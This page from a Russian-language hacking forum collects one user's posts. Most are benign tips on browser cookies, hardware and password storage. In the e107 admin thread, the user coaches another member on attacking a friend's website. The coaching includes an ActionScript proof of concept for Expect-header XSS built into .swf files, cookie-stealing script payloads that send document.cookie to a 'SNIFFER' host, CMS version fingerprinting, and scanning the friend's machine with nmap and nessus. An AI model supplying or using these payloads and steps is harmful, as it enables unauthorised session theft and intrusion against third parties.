Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 5 6 7 8 9 10 11 12 13 14 15 ... 45 След.
Движок е107, админка
 
Цитата
Про первый ваще не фига не понил. Куда что когда куда это всё писать что с этим делать )

Я тебе по русски написал -готовится отдельно Action Script код, с помощью MTASC компилится .swf документ, который может быть загружен на любой хост как вредоносный (содержащий XSS, ворующий куки на сниффер).

Цитата
Про 2 ясней <script>document.location="SNIFFER"+document.cooki­e</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script>­
Куда это пихать? )

Ясней? ) Для начала бы хорошо прояснить собственные знания на тему общего кросс-сайтового скриптинга, вариации которого подставляются сюда:

Код
Get.addRequestHeader("Expect","СЮДА"); 


Цитата
А SNIFFER путь к сниферу?

Да.
Движок е107, админка
 
Лол, уже давно бы сам разобрался.

Проверь http://secunia.com/expect_header_cross-site_scripting_vulnerability_test/ на предмет реального содержания уязвимости, она чекает именно на метод expect.

Простейший пример - с помощью Action Script будем передавать специальные параметры, :

Специально для тебя переписал первый POC на эту тему от SecuriTeam, афишированный Amit Klein до 3 строк:

Цитата
var Get:LoadVars = new LoadVars();
Get.addRequestHeader("Expect","<script>alert(document.cookie)</script>");
Get.send("http://ресурс/","_self","POST");  

Осталось сделать из этого нормальный .sfw документ, у меня лично Flash CS3 - я просто делаю экспорт в .swf и выгружаю на хост. К слову, если ты его не юзаешь, можешь воспользоваться MTASC.  Впариваем, естественно вид XSS другой - привычный с адрессацией на сниффер. Ясное дело, что модифицируешь XSS ты сам, так как научился пользоваться Xspider и явно поймёшь, тем более принцип я указал )

Самые простые конструкции XSS:

Код
<script>document.location="SNIFFER"+document.cookie</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script> 


По поводу Sniffer - php sniffer'ов в сети уйма, найди статью "Немного об XSS" - там приведены примеры.
PHLAK, Professional Hacker’s Linux Assault Kit
 
Цитата
это где уроки и тд?

Позвольте ... Дистрибутивы для проведения тестов на проникновение. В них уже предустановлен необходимый набор соответствующих утилит, что заметно облегчает работу и экономит время.
PHLAK, Professional Hacker’s Linux Assault Kit
 
Отмечу, что по своим способностям, Phlack не обгоняет Pentoo и Backtrack 2. Оффсайт его уже не работает, поэтому воспользуйтесь зеркалом - http://ftp.iasi.roedu.net/mirrors/ftp.phlak.org/pub/phlak/0.2/
Непонятки
 
Походу Вы вообще на птичьих правах в собственном же компьютере.

Цитата
Что такое NetNavigator? у меня нет такого!

Это Вы где такое увидели? Я привёл примеры для наиболее известных браузеров, одним из которых является Netscape Navigator.

Цитата
Хотя нет... У меня как-то по другому

Зависит от Вашего же браузера.
Турникеты в метро
 
Цитата
Вот нашла кое-что http://www.xakep.ru/magazine/xa/029/044/1.asp

Вы бы ещё более древние номера нашли и пытались с этим что-то изобразить.
Непонятки
 
Как настроить приeм кук в Netscape Navigator
Запустите броузер Netscape. В меню найдите Edit - Preferences. Откроется новое окошко. Выберите закладку Advanced, найдите область, которая подписана Cookies.

Как настроить приeм кук в Internet Explorer
Зайдите в Мой Компьютер - Панель управления (Control Panel). Найдите иконку Свойства обозревателя (Internet Options) и щeлкните по ней. Откроется окошко настроек. Выберите закладку Безопасность (Security) и нажмите кнопку Другой... (Custom Level) В появившемся новом окне найдите (потянув бегунок прокрутки вниз) раздел, названный "Файлы Cookies" (Cookies). В обеих секциях этого раздела можно запретить куки (Disable cookies)

В Firefox - Инструменты > Настройки > Приватность > Нижние строки собственно о куках.
][akep attack
 
Цитата
В поле start ввел -1
http://www.friendsofken.co.uk/forum/v...9c60303d11­

и шо це таке , объясните?

Реакция бажного phpbb.
Обрати внимание на changelog - под эту версию в паблике существует описание уязвимости.
Mail.ru вышел из строя
 
Цитата
у меня почта до сих пор не работает и не открывает письма входящие что делать ????

Я думаю это никак не связано с событиями, которые произошли в марте :)
Движок е107, админка
 
Цитата
И ещё очень много обходов безопасности

Ну судя по всему тебе решать какие использовать, если ты, точнее Xspider столько наговорил )

Если уж так любишь сканнеры уязвимостей, советую найти в сети сканнер, профиль которого состоит в обнаружении именно WEB-багов, Acunetix. Возможно он найдёт гораздо больше полезной информации.  

Из отчёта по делу можно воспользоваться XSS уязвимостью.
Интернет мошенники предлагали всем желающим жениться на Анастасии Воло
 
лоол, так кому она нужна :)
Движок е107, админка
 
Уникально.
Движок е107, админка
 
1)
По .css стилям (каскадные таблицы стилей), очень часто в них закоментирована версия самой CMS. Плюс анализировать папки, в которых хранятся .js примочки, они содержат аналогичные вещи, так или иначе намекающие на версию.

Цитата
/*
* Please DO NOT USE or reference any of the following class definitions.
* They are not referenced anywhere in the e107 core. (0.700, 7 Feb 2005)
* This file will be eliminated after the remaining definitions (above)
*   have been either verified as unnecessary, or added to all themes.

Если не судьба, то можно воспользоваться следующим. Понять, выполняются ли уязвимости до какой-либо версии, если нет - следовательно версия старше. На примере:

http://www.securitylab.ru/vulnerability/263008.php

Так или иначе можно понять с какой версии вести отсчёт.
Заметь, что если владеешь XSS, можно решить вопрос "впарив" линк с ним твоему товарищу, ибо некоторые версии e107 имеет кроме вышеописанной уязвимости ещё нефильтрующуюся область в теге [color] .

Цитата

2) скоро дам результаты теста Xspidera
3)с пользой для себя ))) взять важный файл

У вас каникулы начались ?)
Движок е107, админка
 
1)
определись с версией e107, если она скрыта, получить информацию о ней можно из шаблонов скинов. затем в путь сюда http://www.google.ru/search?hl=ru&newwindow=1&client=firefox-a&channel=s&rls=org.mozilla%3Aru%3Aofficial&q=e107+exploit&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

2)
анализировать машину на предмет уязвимостей в ОС и установленных сервисах, тот же Денвер при неграмотной настройке покорен быстрому взлому, не говоря уже о том, что у твоего кента могу быть доступны расшаренные ресурсы, иметься уже годами неудалённые бекдоры и так далее. Я не привык использовать коммерч. сканнеры уязвимостей, поэтому удалённый анализ сетевой активности можно сделать связкой nmap plus nessus.

3)  
зачем тебе это ?)
ДДос, Как обнаружить заказчика?
 
Цитата
2 Маленькая Синичка: сканировать зараженный хост на наличие открытых портов. Может что и попадется. А дальше в зависимости от того что нашли и действовать. При этом активно юзать гугл, т.к. бывает что у бота оказывается открытым порт, который характерен для определенного вида троянов. Раз так, то можно подключиться и по "общаться" с этим ботом. Либо может это будет открытый всем кому ни попадя Remote Admin Server или что-то еще. Короче от ситуации зависит. По крайней мере когда атакует много хостов можно из чего выбрать, быстро отсекая варианты хостов на которых все глухо в плане быстрого взлома.

Скорее всё перечисленное здесь относится к серии обнаружения активности бота в сети.

Цитата
При этом активно юзать гугл, т.к. бывает что у бота оказывается открытым порт, который характерен для определенного вида троянов.  

Очень редко, так как современное вредоносное ПО создаётся ввиде билда с нестандартным портом для бекконекта. Конечно, он может совпасть по своему номеру в упомянутом Вами листе соответствий, но, увы, "животное" будет иметь совершенно другие характеристики и имя.

Цитата
Либо может это будет открытый всем кому ни попадя Remote Admin Server или что-то еще.  

Не понял :) Сабж про DDOS и соответствующих ботов. Оно конечно и может стоять, в качестве сервера для удалённого администрирования, порой даже без пароля, и что? Или Вы таким образом хотите отлов устраивать?)

Цитата
Не, то это понятно. Меня интересует как технически можно взломать бота.

Отловить на Malware Honeypot, если бот имеет "червя" в качестве распространителя - это достаточно лёгко организовывается, другой вопрос когда заражение машин происходит с помощью выгрузки на трафик. Здесь, собственно, важно найти источник распространения, по скриптовому ПО эксплоитов постараться определить путь к прогрузке вредоносного .exe, который затем предстоит реверсить :)

В этом плане, стоит обратить своё внимание в сторону реверс инженеринга и крекинг-тематике.
7 июня закрыли магазины ultracomp.ru как минимум в Москве, Обмениваемся информацией дискутируем
 
В принципе правильно, ведь левая продукция кроме цены, качеством не отличается ...
Фаерволлы и Антивирусы
 
Речь точно не о wipf )
поэтому пропарсите вышеназванные ресурсы, имхо вы попали на сайт Агнитума.
Перезагрузка компа
 
Цитата
обрати внимание на блок питания....поставь заведомо рабочий и мощностью выше чем имеется

Очень правильный совет, обрати на это внимание.
Иногда они просто не качественные.
Пассворд менеджеры
 
Как говорили преподаватели на экзаменах, голова - самое важное :) Ничем её не заменишь, поэтому тренируй память и запоминай жизненно важные пароли, либо храни их на выносных носителях, которые будут только у тебя.
Взломщик сети, Помогите разобраться с мошенником :)
 
Если удасться, стоит проанализировать события и данные остающиеся в Event Viewer'e. Затем уже принимать решения. Конечно, смена пассов, отключение шар, установка АВ и МЭ - является обязательным делом.
Страницы: Пред. 1 ... 5 6 7 8 9 10 11 12 13 14 15 ... 45 След.